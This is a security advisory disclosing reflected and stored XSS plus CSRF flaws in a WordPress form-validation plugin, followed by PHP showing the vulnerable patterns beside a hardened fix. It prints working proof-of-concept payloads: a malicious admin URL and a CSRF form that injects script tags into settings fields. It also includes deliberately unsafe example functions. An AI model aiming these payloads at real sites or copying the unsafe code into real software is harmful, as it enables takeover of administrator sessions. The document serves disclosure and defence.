WordPress WP Accurate Form Data 1.2 XSS / CSRF
Posted on 04 August 2015
Title: WordPress 'WP Accurate Form Data' Plugin
Version: 1.2
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-21
Download:
- https://wordpress.org/plugins/accurate-form-data-real-time-form-validation/
- https://plugins.svn.wordpress.org/accurate-form-data-real-time-form-validation/
Notified WordPress: 2015-06-21

==========================================================
## Plugin description
==========================================================

The plugin performs e-mail and physical address validation automatically for most WordPress contact forms.

==========================================================
## XSS Vulnerabilities
==========================================================

The request URI is echoed into the HTML page without sanitization. This can be exploited with a malicious URL (keep in mind that most modern browsers encode the URL).

http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP&a="><script>alert(1)</script>

----

The options on the admin settings page are displayed and stored without sanitization. This can be exploited with a crafted POST request.
PoC (using CSRF): Log in as admin and submit the following form:

<form method="POST" action="http://[URL]/wp-admin/options-general.php?page=Accu_Data_WP">
  <input type="text" name="wClientKey" value=""><script>alert(1)</script>"><br />
  <text>wCheckEmailValidity: </text>
  <input type="text" name="wCheckEmailValidity" value=""><br />
  <input type="text" name="wIncludeOpen" value=""><br />
  <input type="text" name="wEmailBlockAttempts" value=""><script>alert(4)</script>"><br />
  <input type="text" name="wEmailFields" value=""><script>alert(5)</script>"><br />
  <input type="text" name="wCheckPhysicalAddressValidity" value=""><br />
  <input type="text" name="wPhysicalAddressBlockAttempts" value=""><script>alert(7)</script>"><br />
  <input type="text" name="wCityFields" value=""><script>alert(8)</script>"><br />
  <input type="text" name="wZipFields" value=""><script>alert(9)</script>"><br />
  <input type="text" name="wAddressFields" value=""><script>alert(10)</script>"><br />
  <input type="text" name="wStateFields" value=""><script>alert(11)</script>"><br />
  <input type="text" name="wCountryFields" value=""><script>alert(12)</script>"><br />
  <text>wSub </text>
  <input type="text" name="wSub" value="Save Changes" readonly><br />
  <input type="submit">
</form>

==========================================================
## Solution
==========================================================

No fix available

==========================================================

XSS vulnerabilities found using Eir, an early-stage static vulnerability scanner for PHP applications.
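The advisory reports no fix. As an added illustration for defenders (not the plugin's code, whose internals this page does not show), the WordPress PHP below places the two flaws described above beside a hardened equivalent: the raw request URI reflected into a form action, options echoed into input values without escaping, and a settings save that accepts any POST. The function names, the option name accu_data_settings and the nonce action accu_data_save are assumptions; the field names wClientKey and wSub and the page slug Accu_Data_WP come from the advisory.

```php
<?php
// Added illustration, not the plugin's own code. Option name and function
// names are assumptions; field names and page slug come from the advisory.

// --- Unsafe patterns the advisory describes --------------------------------

function accu_form_open_unsafe() {
    // REQUEST_URI is attacker-controlled. Echoing it raw lets a crafted query
    // string close the attribute and inject markup (reflected XSS).
    return '<form method="POST" action="' . $_SERVER['REQUEST_URI'] . '">';
}

function accu_client_key_input_unsafe( $opts ) {
    // Stored option rendered without esc_attr(): a value saved with quotes and
    // a <script> tag runs for every admin who opens the page (stored XSS).
    return '<input type="text" name="wClientKey" value="' . $opts['wClientKey'] . '">';
}

function accu_save_unsafe() {
    // No nonce and no capability check: any site that can make the logged-in
    // admin's browser POST here can overwrite the settings (CSRF).
    update_option( 'accu_data_settings', array( 'wClientKey' => $_POST['wClientKey'] ) );
}

// --- Hardened equivalent ---------------------------------------------------

function accu_render_settings_page() {
    // Only users allowed to manage options should even see the form.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }
    $opts       = get_option( 'accu_data_settings', array() );
    $client_key = isset( $opts['wClientKey'] ) ? $opts['wClientKey'] : '';

    // Build the action from a known admin URL instead of REQUEST_URI, and
    // escape it for an attribute context with esc_url().
    $action = admin_url( 'options-general.php?page=Accu_Data_WP' );
    ?>
    <form method="POST" action="<?php echo esc_url( $action ); ?>">
        <?php
        // Emits a hidden nonce field tied to this user and this action; a
        // cross-site form cannot know or forge it.
        wp_nonce_field( 'accu_data_save', 'accu_data_nonce' );
        ?>
        <label for="wClientKey">Client key</label>
        <!-- esc_attr() neutralises quotes and angle brackets in the stored value -->
        <input type="text" id="wClientKey" name="wClientKey"
               value="<?php echo esc_attr( $client_key ); ?>">
        <input type="submit" name="wSub" value="Save Changes">
    </form>
    <?php
}

function accu_handle_settings_save() {
    if ( ! isset( $_POST['wSub'] ) ) {
        return;
    }
    // CSRF: dies with a 403 unless the nonce matches the current user+action.
    check_admin_referer( 'accu_data_save', 'accu_data_nonce' );

    // Authorization: the nonce proves intent, not privilege, so check both.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges' );
    }

    // Input sanitization is defence in depth; output escaping above is what
    // actually prevents the stored XSS if a bad value ever lands in the DB.
    $raw        = isset( $_POST['wClientKey'] ) ? wp_unslash( $_POST['wClientKey'] ) : '';
    $client_key = sanitize_text_field( $raw );

    update_option( 'accu_data_settings', array( 'wClientKey' => $client_key ) );
}

// Hook the handler early on admin requests so it runs before the page renders.
add_action( 'admin_init', 'accu_handle_settings_save' );
```

The important design point is that escaping is chosen by output context: esc_url() for the action attribute, esc_attr() for input values. Sanitizing on save alone would not have stopped the advisory's second finding, because a value stored by any other path would still be rendered unescaped; and the nonce alone does not replace the capability check, since a low-privilege user who can reach the page could otherwise still submit it.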